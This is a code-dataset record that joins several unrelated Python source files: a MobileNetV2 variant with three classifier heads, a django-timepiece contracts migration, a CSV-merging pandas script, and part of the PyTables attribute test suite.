            output_channel = _make_divisible(c * width_mult, round_nearest)
            for i in range(n):
                # Only the first block of each stage downsamples.
                stride = s if i == 0 else 1
                features.append(block(input_channel, output_channel, stride, expand_ratio=t, norm_layer=norm_layer))
                input_channel = output_channel
        # building last several layers
        features.append(ConvBNReLU(input_channel, self.last_channel, kernel_size=1, norm_layer=norm_layer))
        # make it nn.Sequential
        self.features = nn.Sequential(*features)
        # building classifier
        self.num_ori = num_ori
        self.num_shape = num_shape
        self.num_exp = num_exp
        self.classifier_ori = nn.Sequential(
            nn.Dropout(0.2),
            nn.Linear(self.last_channel, self.num_ori),
        )
        self.classifier_shape = nn.Sequential(
            nn.Dropout(0.2),
            nn.Linear(self.last_channel, self.num_shape),
        )
        self.classifier_exp = nn.Sequential(
            nn.Dropout(0.2),
            nn.Linear(self.last_channel, self.num_exp),
        )
        # weight initialization
        # NOTE: module creation and init order above is deliberate — changing it
        # would change which RNG draws each layer receives.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out')
                if m.bias is not None:
                    nn.init.zeros_(m.bias)
            elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
                nn.init.ones_(m.weight)
                nn.init.zeros_(m.bias)
            elif isinstance(m, nn.Linear):
                nn.init.normal_(m.weight, 0, 0.01)
                nn.init.zeros_(m.bias)

    def _forward_impl(self, x):
        # This exists since TorchScript doesn't support inheritance, so the superclass method
        # (this one) needs to have a name other than `forward` that can be accessed in a subclass
        x = self.features(x)
        x = nn.functional.adaptive_avg_pool2d(x, 1)
        x = x.reshape(x.shape[0], -1)
        # Keep a copy of the pooled features; they are returned alongside the heads.
        pool_x = x.clone()
        x_ori = self.classifier_ori(x)
        x_shape = self.classifier_shape(x)
        x_exp = self.classifier_exp(x)
        # Concatenate the three heads: (batch, num_ori + num_shape + num_exp).
        x = torch.cat((x_ori, x_shape, x_exp), dim=1)
        return x, pool_x

    def forward(self, x):
        return self._forward_impl(x)
def mobilenet_v2(pretrained=False, progress=True, **kwargs):
    """
    Constructs a MobileNetV2 architecture from
    `"MobileNetV2: Inverted Residuals and Linear Bottlenecks" <https://arxiv.org/abs/1801.04381>`_.

    Args:
        pretrained (bool): If True, returns a model pre-trained on ImageNet
        progress (bool): If True, displays a progress bar of the download to stderr
    """
    model = MobileNetV2(**kwargs)
    if not pretrained:
        return model
    # The checkpoint only covers the backbone; the extra regression heads are
    # absent from it, hence strict=False.
    state_dict = load_state_dict_from_url(model_urls['mobilenet_v2'], progress=progress)
    model.load_state_dict(state_dict, strict=False)
    return model
fa3091a7e0aa94edcb8420e4aefae5bb2d85a8de | 4,041 | py | Python | timepiece/contracts/migrations/0001_initial.py | sha-red/django-timepiece | 52515dec027664890efbc535429e1ba1ee152f40 | [
"MIT"
] | 244 | 2015-01-08T11:06:52.000Z | 2022-03-24T14:59:26.000Z | timepiece/contracts/migrations/0001_initial.py | skampala1/django-timepiece | 52515dec027664890efbc535429e1ba1ee152f40 | [
"MIT"
] | 80 | 2015-01-23T13:45:02.000Z | 2021-11-25T09:17:05.000Z | timepiece/contracts/migrations/0001_initial.py | anfema/django-timepiece | c4594ae053bdb14c1dd7f17f32c6ef1bf0f3b453 | [
"MIT"
] | 109 | 2015-01-24T06:52:56.000Z | 2022-03-29T09:35:06.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Initial schema for the timepiece contracts app, auto-generated by
    # `makemigrations`. This migration has shipped — do not edit field
    # definitions in place; add a new migration instead.

    dependencies = [
    ]

    operations = [
        # Hours assigned to a contract over a date range.
        migrations.CreateModel(
            name='ContractAssignment',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('start_date', models.DateField()),
                ('end_date', models.DateField()),
                ('num_hours', models.DecimalField(default=0, max_digits=8, decimal_places=2)),
                ('min_hours_per_week', models.IntegerField(default=0)),
            ],
            options={
                'db_table': 'timepiece_contractassignment',
            },
            bases=(models.Model,),
        ),
        # A request for contracted hours, with an approval workflow.
        migrations.CreateModel(
            name='ContractHour',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('hours', models.DecimalField(default=0, max_digits=8, decimal_places=2)),
                ('date_requested', models.DateField()),
                ('date_approved', models.DateField(null=True, blank=True)),
                ('status', models.IntegerField(default=1, choices=[(1, b'Pending'), (2, b'Approved')])),
                ('notes', models.TextField(blank=True)),
            ],
            options={
                'db_table': 'timepiece_contracthour',
                'verbose_name': 'contracted hours',
                'verbose_name_plural': 'contracted hours',
            },
            bases=(models.Model,),
        ),
        # A batch of time entries grouped for invoicing.
        migrations.CreateModel(
            name='EntryGroup',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('status', models.CharField(default=b'invoiced', max_length=24, choices=[(b'not-invoiced', b'Not Invoiced'), (b'invoiced', b'Invoiced')])),
                ('number', models.CharField(max_length=50, null=True, verbose_name=b'Reference #', blank=True)),
                ('comments', models.TextField(null=True, blank=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('modified', models.DateTimeField(auto_now=True)),
                ('start', models.DateField(null=True, blank=True)),
                ('end', models.DateField()),
            ],
            options={
                'db_table': 'timepiece_entrygroup',
            },
            bases=(models.Model,),
        ),
        # Named bucket for categorizing hours on invoices.
        migrations.CreateModel(
            name='HourGroup',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(unique=True, max_length=255)),
                ('order', models.PositiveIntegerField(unique=True, null=True, blank=True)),
            ],
            options={
                'db_table': 'timepiece_hourgroup',
            },
            bases=(models.Model,),
        ),
        # The contract itself, with lifecycle status and billing type.
        migrations.CreateModel(
            name='ProjectContract',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('name', models.CharField(max_length=255)),
                ('start_date', models.DateField()),
                ('end_date', models.DateField()),
                ('status', models.CharField(default=b'upcoming', max_length=32, choices=[(b'current', b'Current'), (b'complete', b'Complete'), (b'upcoming', b'Upcoming')])),
                ('type', models.IntegerField(choices=[(1, b'Fixed'), (2, b'Pre-paid Hourly'), (3, b'Post-paid Hourly')])),
            ],
            options={
                'ordering': ('-end_date',),
                'db_table': 'timepiece_projectcontract',
                'verbose_name': 'contract',
            },
            bases=(models.Model,),
        ),
    ]
| 44.406593 | 173 | 0.537491 |
157e0aebd49f783a4e748dadc160932bf847282f | 458 | py | Python | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | Scripts/single_points.py | matthewtoholland/Boronic-Acid-Catalysis | e2697831a0056b3aadf9e308d2fd4e0ed7a57bdf | [
"MIT"
] | null | null | null | import os
import glob
import pandas as pd
# Gather every per-calculation CSV exported from the single-point runs.
# NOTE(review): paths are hard-coded to one user's OneDrive — parameterize before reuse.
all_filenames = [i for i in glob.glob('/Users/matthewholland/OneDrive/Oxford/Amide Bond Formation/Data/single_points/*')]
# Stack all per-file tables into one frame (rows appended in glob order).
combined_csv = pd.concat([pd.read_csv(f) for f in all_filenames])
# Write one merged CSV; `header=` renames the columns on output.
# NOTE(review): with index=False the 'index' header must label an existing data
# column (five data columns expected) — confirm against the input CSV schema.
combined_csv.to_csv('/Users/matthewholland/OneDrive/Oxford/Amide Bond Formation/Data/all_single_points.csv', index=False, header=['index', 'amine_single_point','acid_single_point','product_single_point','delta_g_reaction'])
| 41.636364 | 223 | 0.796943 |
5172a299ee05d856db7e60dc39302a0384c3b014 | 59,854 | py | Python | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
] | 3 | 2016-03-14T07:49:32.000Z | 2019-08-26T03:10:21.000Z | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
] | null | null | null | tables/tests/test_attributes.py | joshmoore/PyTables | 5065497fdc04f07c551c56b8b0280892fcffad03 | [
"BSD-3-Clause"
""" This test unit checks node attributes that are persistent (AttributeSet).
"""
import sys
import unittest
import os
import tempfile
import numpy
from numpy.testing import assert_array_equal, assert_almost_equal
from tables.parameters import NODE_CACHE_SLOTS
from tables import *
from tables.tests import common
from tables.tests.common import PyTablesTestCase
from tables.exceptions import DataTypeWarning
# To delete the internal attributes automagically: patch every TestCase so the
# shared cleanup helper runs after each test (individual cases below may still
# define their own tearDown, which takes precedence).
unittest.TestCase.tearDown = common.cleanup
class Record(IsDescription):
    """Row schema used by the test tables created below."""
    var1 = StringCol(itemsize=4)  # 4-character String
    var2 = IntCol()               # integer
    var3 = Int16Col()             # short integer
    var4 = FloatCol()             # double (double-precision)
    var5 = Float32Col()           # float (single-precision)
class CreateTestCase(unittest.TestCase):
    def setUp(self):
        # Build a fresh temporary HDF5 file with one table, one array and one
        # group to attach attributes to.
        # `self.nodeCacheSlots` (and `self.close` used by the tests) are
        # provided by concrete subclasses — TODO confirm against subclasses.
        # Create an instance of HDF5 Table
        self.file = tempfile.mktemp(".h5")
        self.fileh = openFile(
            self.file, mode = "w", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
        # Create a table object
        self.table = self.fileh.createTable(self.root, 'atable',
                                            Record, "Table title")
        # Create an array object
        self.array = self.fileh.createArray(self.root, 'anarray',
                                            [1], "Array title")
        # Create a group object
        self.group = self.fileh.createGroup(self.root, 'agroup',
                                            "Group title")
    def tearDown(self):
        # Close and delete the temporary HDF5 file, then run the shared cleanup.
        self.fileh.close()
        os.remove(self.file)
        common.cleanup(self)
#---------------------------------------
    def test01_setAttributes(self):
        """Checking setting large string attributes (File methods)"""
        attrlength = 2048
        # Try to put a long string attribute on a group object
        attr = self.fileh.setNodeAttr(self.root.agroup,
                                      "attr1", "p" * attrlength)
        # Now, try with a Table object
        attr = self.fileh.setNodeAttr(self.root.atable,
                                      "attr1", "a" * attrlength)
        # Finally, try with an Array object
        attr = self.fileh.setNodeAttr(self.root.anarray,
                                      "attr1", "n" * attrlength)
        # When the subclass sets self.close, reopen the file so the attributes
        # are read back from disk rather than from in-memory state.
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
            self.root = self.fileh.root
        self.assertEqual(self.fileh.getNodeAttr(self.root.agroup, 'attr1'),
                         "p" * attrlength)
        self.assertEqual(self.fileh.getNodeAttr(self.root.atable, 'attr1'),
                         "a" * attrlength)
        self.assertEqual(self.fileh.getNodeAttr(self.root.anarray, 'attr1'),
                         "n" * attrlength)
    def test02_setAttributes(self):
        """Checking setting large string attributes (Node methods)"""
        attrlength = 2048
        # Try to put a long string attribute on a group object
        self.root.agroup._f_setAttr('attr1', "p" * attrlength)
        # Now, try with a Table object
        self.root.atable.setAttr('attr1', "a" * attrlength)
        # Finally, try with an Array object
        self.root.anarray.setAttr('attr1', "n" * attrlength)
        # Optionally reopen the file so values are read back from disk.
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
            self.root = self.fileh.root
        self.assertEqual(self.root.agroup._f_getAttr('attr1'), "p" * attrlength)
        self.assertEqual(self.root.atable.getAttr("attr1"), "a" * attrlength)
        self.assertEqual(self.root.anarray.getAttr("attr1"), "n" * attrlength)
    def test03_setAttributes(self):
        """Checking setting large string attributes (AttributeSet methods)"""
        attrlength = 2048
        # Try to put a long string attribute on a group object
        self.group._v_attrs.attr1 = "p" * attrlength
        # Now, try with a Table object
        self.table.attrs.attr1 = "a" * attrlength
        # Finally, try with an Array object
        self.array.attrs.attr1 = "n" * attrlength
        # Optionally reopen the file so values are read back from disk.
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
            self.root = self.fileh.root
        # This should work even when the node cache is disabled
        self.assertEqual(self.root.agroup._v_attrs.attr1, "p" * attrlength)
        self.assertEqual(self.root.atable.attrs.attr1, "a" * attrlength)
        self.assertEqual(self.root.anarray.attrs.attr1, "n" * attrlength)
    def test04_listAttributes(self):
        """Checking listing attributes """
        # With a Group object
        self.group._v_attrs.pq = "1"
        self.group._v_attrs.qr = "2"
        self.group._v_attrs.rs = "3"
        if common.verbose:
            print "Attribute list:", self.group._v_attrs._f_list()
        # Now, try with a Table object
        self.table.attrs.a = "1"
        self.table.attrs.c = "2"
        self.table.attrs.b = "3"
        if common.verbose:
            print "Attribute list:", self.table.attrs._f_list()
        # Finally, try with an Array object
        self.array.attrs.k = "1"
        self.array.attrs.j = "2"
        self.array.attrs.i = "3"
        if common.verbose:
            print "Attribute list:", self.array.attrs._f_list()
        # Optionally reopen the file so the listings come from disk.
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
            self.root = self.fileh.root
        agroup = self.root.agroup
        # The expected lists below show _f_list() returns names alphabetically
        # sorted (attributes were set as a, c, b but come back as a, b, c).
        self.assertEqual(agroup._v_attrs._f_list("user"), ["pq", "qr", "rs"])
        self.assertEqual(agroup._v_attrs._f_list("sys"),
                         ['CLASS', 'TITLE', 'VERSION'])
        self.assertEqual(agroup._v_attrs._f_list("all"),
                         ['CLASS', 'TITLE', 'VERSION', "pq", "qr", "rs"])
        atable = self.root.atable
        self.assertEqual(atable.attrs._f_list(), ["a", "b", "c"])
        self.assertEqual(atable.attrs._f_list("sys"),
                         ['CLASS',
                          'FIELD_0_FILL', 'FIELD_0_NAME',
                          'FIELD_1_FILL', 'FIELD_1_NAME',
                          'FIELD_2_FILL', 'FIELD_2_NAME',
                          'FIELD_3_FILL', 'FIELD_3_NAME',
                          'FIELD_4_FILL', 'FIELD_4_NAME',
                          'NROWS',
                          'TITLE', 'VERSION'])
        self.assertEqual(atable.attrs._f_list("all"),
                         ['CLASS',
                          'FIELD_0_FILL', 'FIELD_0_NAME',
                          'FIELD_1_FILL', 'FIELD_1_NAME',
                          'FIELD_2_FILL', 'FIELD_2_NAME',
                          'FIELD_3_FILL', 'FIELD_3_NAME',
                          'FIELD_4_FILL', 'FIELD_4_NAME',
                          'NROWS',
                          'TITLE', 'VERSION',
                          "a", "b", "c"])
        anarray = self.root.anarray
        self.assertEqual(anarray.attrs._f_list(), ["i", "j", "k"])
        self.assertEqual(anarray.attrs._f_list("sys"),
                         ['CLASS', 'FLAVOR', 'TITLE', 'VERSION'])
        self.assertEqual(anarray.attrs._f_list("all"),
                         ['CLASS', 'FLAVOR', 'TITLE', 'VERSION', "i", "j", "k"])
    def test05_removeAttributes(self):
        """Checking removing attributes """
        # With a Group object
        self.group._v_attrs.pq = "1"
        self.group._v_attrs.qr = "2"
        self.group._v_attrs.rs = "3"
        # delete an attribute
        del self.group._v_attrs.pq
        # Optionally reopen the file so the listings below come from disk.
        if self.close:
            if common.verbose:
                print "(closing file version)"
            self.fileh.close()
            self.fileh = openFile(
                self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
            self.root = self.fileh.root
        agroup = self.root.agroup
        if common.verbose:
            print "Attribute list:", agroup._v_attrs._f_list()
        # Check the local attributes names
        self.assertEqual(agroup._v_attrs._f_list(), ["qr", "rs"])
        if common.verbose:
            print "Attribute list in disk:", \
                  agroup._v_attrs._f_list("all")
        # Check the disk attribute names
        self.assertEqual(agroup._v_attrs._f_list("all"),
                         ['CLASS', 'TITLE', 'VERSION', "qr", "rs"])
        # delete an attribute (__delattr__ method)
        del agroup._v_attrs.qr
        if common.verbose:
            print "Attribute list:", agroup._v_attrs._f_list()
        # Check the local attributes names
        self.assertEqual(agroup._v_attrs._f_list(), ["rs"])
        if common.verbose:
            print "Attribute list in disk:", \
                  agroup._v_attrs._f_list()
        # Check the disk attribute names
        self.assertEqual(agroup._v_attrs._f_list("all"),
                         ['CLASS', 'TITLE', 'VERSION', "rs"])
def test05b_removeAttributes(self):
    """Checking removing attributes (using File.delNodeAttr()).

    Same checks as test05, but deleting through the ``File`` API
    instead of ``del`` on the attribute set.
    """
    # With a Group object
    self.group._v_attrs.pq = "1"
    self.group._v_attrs.qr = "2"
    self.group._v_attrs.rs = "3"
    # delete an attribute
    self.fileh.delNodeAttr(self.group, "pq")
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    agroup = self.root.agroup
    if common.verbose:
        print "Attribute list:", agroup._v_attrs._f_list()
    # Check the local (user) attribute names
    self.assertEqual(agroup._v_attrs._f_list(), ["qr", "rs"])
    if common.verbose:
        print "Attribute list in disk:", \
              agroup._v_attrs._f_list("all")
    # Check the full attribute names (system + user)
    self.assertEqual(agroup._v_attrs._f_list("all"),
                     ['CLASS', 'TITLE', 'VERSION', "qr", "rs"])
    # delete an attribute (File.delNodeAttr method, node given by path)
    self.fileh.delNodeAttr(self.root, "qr", "agroup")
    if common.verbose:
        print "Attribute list:", agroup._v_attrs._f_list()
    # Check the local (user) attribute names
    self.assertEqual(agroup._v_attrs._f_list(), ["rs"])
    if common.verbose:
        print "Attribute list in disk:", \
              agroup._v_attrs._f_list()
    # Check the full attribute names (system + user)
    self.assertEqual(agroup._v_attrs._f_list("all"),
                     ['CLASS', 'TITLE', 'VERSION', "rs"])
def test06_removeAttributes(self):
"""Checking removing system attributes """
# remove a system attribute
if common.verbose:
print "Before removing CLASS attribute"
print "System attrs:", self.group._v_attrs._v_attrnamessys
del self.group._v_attrs.CLASS
self.assertEqual(self.group._v_attrs._f_list("sys"),
['TITLE', 'VERSION'])
if common.verbose:
print "After removing CLASS attribute"
print "System attrs:", self.group._v_attrs._v_attrnamessys
def test07_renameAttributes(self):
    """Checking renaming attributes.

    Renames a user attribute with ``_f_rename`` and checks both the
    user and the full (system + user) name listings afterwards.
    """
    # With a Group object
    self.group._v_attrs.pq = "1"
    self.group._v_attrs.qr = "2"
    self.group._v_attrs.rs = "3"
    # rename an attribute
    self.group._v_attrs._f_rename("pq", "op")
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    agroup = self.root.agroup
    if common.verbose:
        print "Attribute list:", agroup._v_attrs._f_list()
    # Check the local attributes names (alphabetically sorted)
    self.assertEqual(agroup._v_attrs._f_list(), ["op", "qr", "rs"])
    if common.verbose:
        print "Attribute list in disk:", agroup._v_attrs._f_list("all")
    # Check the disk attribute names (not sorted)
    self.assertEqual(agroup._v_attrs._f_list("all"),
                     ['CLASS', 'TITLE', 'VERSION', "op", "qr", "rs"])
def test08_renameAttributes(self):
"""Checking renaming system attributes """
if common.verbose:
print "Before renaming CLASS attribute"
print "All attrs:", self.group._v_attrs._v_attrnames
# rename a system attribute
self.group._v_attrs._f_rename("CLASS", "op")
if common.verbose:
print "After renaming CLASS attribute"
print "All attrs:", self.group._v_attrs._v_attrnames
# Check the disk attribute names (not sorted)
agroup = self.root.agroup
self.assertEqual(agroup._v_attrs._f_list("all"),
['TITLE', 'VERSION', "op"])
def test09_overwriteAttributes(self):
    """Checking overwriting attributes.

    Overwrites existing attributes with values of different types and
    verifies the new values (optionally after a close/reopen cycle).
    """
    # With a Group object
    self.group._v_attrs.pq = "1"
    self.group._v_attrs.qr = "2"
    self.group._v_attrs.rs = "3"
    # overwrite attributes (note the type changes: str, int, list)
    self.group._v_attrs.pq = "4"
    self.group._v_attrs.qr = 2
    self.group._v_attrs.rs = [1,2,3]
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    agroup = self.root.agroup
    if common.verbose:
        print "Value of Attribute pq:", agroup._v_attrs.pq
    # Check the overwritten values
    self.assertEqual(agroup._v_attrs.pq, "4")
    self.assertEqual(agroup._v_attrs.qr, 2)
    self.assertEqual(agroup._v_attrs.rs, [1,2,3])
    if common.verbose:
        print "Attribute list in disk:", \
              agroup._v_attrs._f_list("all")
    # Check the disk attribute names (not sorted)
    self.assertEqual(agroup._v_attrs._f_list("all"),
                     ['CLASS', 'TITLE', 'VERSION', "pq", "qr", "rs"])
def test10a_copyAttributes(self):
    """Checking copying attributes.

    Copies all user attributes from a Group to a Table with
    ``AttributeSet._f_copy`` and checks both name listings on the
    destination.
    """
    # With a Group object
    self.group._v_attrs.pq = "1"
    self.group._v_attrs.qr = "2"
    self.group._v_attrs.rs = "3"
    # copy all attributes from "/agroup" to "/atable"
    self.group._v_attrs._f_copy(self.root.atable)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    atable = self.root.atable
    if common.verbose:
        print "Attribute list:", atable._v_attrs._f_list()
    # Check the local attributes names (alphabetically sorted)
    self.assertEqual(atable._v_attrs._f_list(), ["pq", "qr", "rs"])
    if common.verbose:
        print "Complete attribute list:", atable._v_attrs._f_list("all")
    # Check the disk attribute names (not sorted)
    self.assertEqual(atable._v_attrs._f_list("all"),
                     ['CLASS',
                      'FIELD_0_FILL', 'FIELD_0_NAME',
                      'FIELD_1_FILL', 'FIELD_1_NAME',
                      'FIELD_2_FILL', 'FIELD_2_NAME',
                      'FIELD_3_FILL', 'FIELD_3_NAME',
                      'FIELD_4_FILL', 'FIELD_4_NAME',
                      'NROWS',
                      'TITLE', 'VERSION',
                      "pq", "qr", "rs"])
def test10b_copyAttributes(self):
    """Checking copying attributes (copyNodeAttrs).

    Same checks as test10a, but copying through the ``File`` API
    instead of ``AttributeSet._f_copy``.
    """
    # With a Group object
    self.group._v_attrs.pq = "1"
    self.group._v_attrs.qr = "2"
    self.group._v_attrs.rs = "3"
    # copy all attributes from "/agroup" to "/atable"
    self.fileh.copyNodeAttrs(self.group, self.root.atable)
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    atable = self.root.atable
    if common.verbose:
        print "Attribute list:", atable._v_attrs._f_list()
    # Check the local attributes names (alphabetically sorted)
    self.assertEqual(atable._v_attrs._f_list(), ["pq", "qr", "rs"])
    if common.verbose:
        print "Complete attribute list:", atable._v_attrs._f_list("all")
    # Check the disk attribute names (not sorted)
    self.assertEqual(atable._v_attrs._f_list("all"),
                     ['CLASS',
                      'FIELD_0_FILL', 'FIELD_0_NAME',
                      'FIELD_1_FILL', 'FIELD_1_NAME',
                      'FIELD_2_FILL', 'FIELD_2_NAME',
                      'FIELD_3_FILL', 'FIELD_3_NAME',
                      'FIELD_4_FILL', 'FIELD_4_NAME',
                      'NROWS',
                      'TITLE', 'VERSION',
                      "pq", "qr", "rs"])
def test10c_copyAttributes(self):
    """Checking copying attributes during group copies.

    Overridden system attributes (CLASS, VERSION) must travel with the
    node when it is copied.
    """
    # With a Group object: override two system attributes
    self.group._v_attrs['CLASS'] = "GROUP2"
    self.group._v_attrs['VERSION'] = "1.3"
    # copy "/agroup" to "/agroup2"
    self.fileh.copyNode(self.group, self.root, "agroup2")
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    agroup2 = self.root.agroup2
    if common.verbose:
        print "Complete attribute list:", agroup2._v_attrs._f_list("all")
    self.assertEqual(agroup2._v_attrs['CLASS'], "GROUP2")
    self.assertEqual(agroup2._v_attrs['VERSION'], "1.3")
def test10d_copyAttributes(self):
    """Checking copying attributes during leaf copies.

    Same idea as test10c, but for a Table leaf instead of a Group.
    """
    # With a Table (leaf) object: override two system attributes
    atable = self.root.atable
    atable._v_attrs['CLASS'] = "TABLE2"
    atable._v_attrs['VERSION'] = "1.3"
    # copy "/atable" to "/atable2"
    self.fileh.copyNode(atable, self.root, "atable2")
    if self.close:
        if common.verbose:
            print "(closing file version)"
        # Reopen so the following checks read what was flushed to disk.
        self.fileh.close()
        self.fileh = openFile(
            self.file, mode = "r+", NODE_CACHE_SLOTS=self.nodeCacheSlots)
        self.root = self.fileh.root
    atable2 = self.root.atable2
    if common.verbose:
        print "Complete attribute list:", atable2._v_attrs._f_list("all")
    self.assertEqual(atable2._v_attrs['CLASS'], "TABLE2")
    self.assertEqual(atable2._v_attrs['VERSION'], "1.3")
def test11a_getitem(self):
    """An attribute set via attribute access must be readable through
    the ``__getitem__`` mapping interface."""
    attrset = self.group._v_attrs
    attrset.pq = "1"
    self.assertEqual(attrset['pq'], "1")
def test11b_setitem(self):
    """An attribute set through ``__setitem__`` must be readable back
    through ``__getitem__``."""
    attrset = self.group._v_attrs
    attrset['pq'] = "2"
    self.assertEqual(attrset['pq'], "2")
def test11c_delitem(self):
    """``del attrs[name]`` must remove the attribute from the user
    attribute listing."""
    attrset = self.group._v_attrs
    attrset.pq = "1"
    del attrset['pq']
    self.assertTrue('pq' not in attrset._f_list())
def test11d_KeyError(self):
    """Looking up or deleting a missing attribute through the mapping
    interface must raise ``KeyError``."""
    attrset = self.group._v_attrs
    self.assertRaises(KeyError, attrset.__getitem__, 'pq')
    self.assertRaises(KeyError, attrset.__delitem__, 'pq')
class NotCloseCreate(CreateTestCase):
    # Variant: keep the file open between write and check phases.
    close = False
    nodeCacheSlots = NODE_CACHE_SLOTS
class CloseCreate(CreateTestCase):
    # Variant: close and reopen the file before the check phase.
    close = True
    nodeCacheSlots = NODE_CACHE_SLOTS
class NoCacheNotCloseCreate(CreateTestCase):
    # Variant: nodeCacheSlots=0 ("no cache" per class name), file kept open.
    close = False
    nodeCacheSlots = 0
class NoCacheCloseCreate(CreateTestCase):
    # Variant: nodeCacheSlots=0 ("no cache" per class name), file reopened.
    close = True
    nodeCacheSlots = 0
class DictCacheNotCloseCreate(CreateTestCase):
    # Variant: negative slot count ("dict cache" per class name), file
    # kept open.
    close = False
    nodeCacheSlots = -NODE_CACHE_SLOTS
class DictCacheCloseCreate(CreateTestCase):
    # Variant: negative slot count ("dict cache" per class name), file
    # reopened.
    close = True
    nodeCacheSlots = -NODE_CACHE_SLOTS
class TypesTestCase(unittest.TestCase):
def setUp(self):
    """Create a fresh temporary HDF5 file holding one Array and one
    Group node for each test."""
    # Create an instance of HDF5 Table
    self.file = tempfile.mktemp(".h5")
    self.fileh = openFile(self.file, mode = "w")
    self.root = self.fileh.root
    # Create an array object
    self.array = self.fileh.createArray(self.root, 'anarray',
                                        [1], "Array title")
    # Create a group object
    self.group = self.fileh.createGroup(self.root, 'agroup',
                                        "Group title")
def tearDown(self):
    """Close the file handle and remove the temporary file from disk."""
    self.fileh.close()
    os.remove(self.file)
    common.cleanup(self)

#---------------------------------------
def test00a_setBoolAttributes(self):
"""Checking setting Bool attributes (scalar, Python case)"""
self.array.attrs.pq = True
self.array.attrs.qr = False
self.array.attrs.rs = True
# Check the results
if common.verbose:
print "pq -->", self.array.attrs.pq
print "qr -->", self.array.attrs.qr
print "rs -->", self.array.attrs.rs
if self.close:
if common.verbose:
print "(closing file version)"
self.fileh.close()
self.fileh = openFile(self.file, mode = "r+")
self.root = self.fileh.root
self.array = self.fileh.root.anarray
self.assertEqual(self.root.anarray.attrs.pq, True)
self.assertEqual(self.root.anarray.attrs.qr, False)
self.assertEqual(self.root.anarray.attrs.rs, True)
def test00b_setBoolAttributes(self):
    """Checking setting Bool attributes (scalar, NumPy case).

    The values must come back as ``numpy.bool_`` scalars, not plain
    Python bools.
    """
    self.array.attrs.pq = numpy.bool_(True)
    self.array.attrs.qr = numpy.bool_(False)
    self.array.attrs.rs = numpy.bool_(True)
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
        print "qr -->", self.array.attrs.qr
        print "rs -->", self.array.attrs.rs
    if self.close:
        if common.verbose:
            print "(closing file version)"
        self.fileh.close()
        self.fileh = openFile(self.file, mode = "r+")
        self.root = self.fileh.root
        self.array = self.fileh.root.anarray
    self.assertTrue(isinstance(self.root.anarray.attrs.pq, numpy.bool_))
    self.assertTrue(isinstance(self.root.anarray.attrs.qr, numpy.bool_))
    self.assertTrue(isinstance(self.root.anarray.attrs.rs, numpy.bool_))
    self.assertEqual(self.root.anarray.attrs.pq, True)
    self.assertEqual(self.root.anarray.attrs.qr, False)
    self.assertEqual(self.root.anarray.attrs.rs, True)
def test00c_setBoolAttributes(self):
    """Checking setting Bool attributes (NumPy, 0-dim case)."""
    self.array.attrs.pq = numpy.array(True)
    self.array.attrs.qr = numpy.array(False)
    self.array.attrs.rs = numpy.array(True)
    # Check the results
    if common.verbose:
        print "pq -->", self.array.attrs.pq
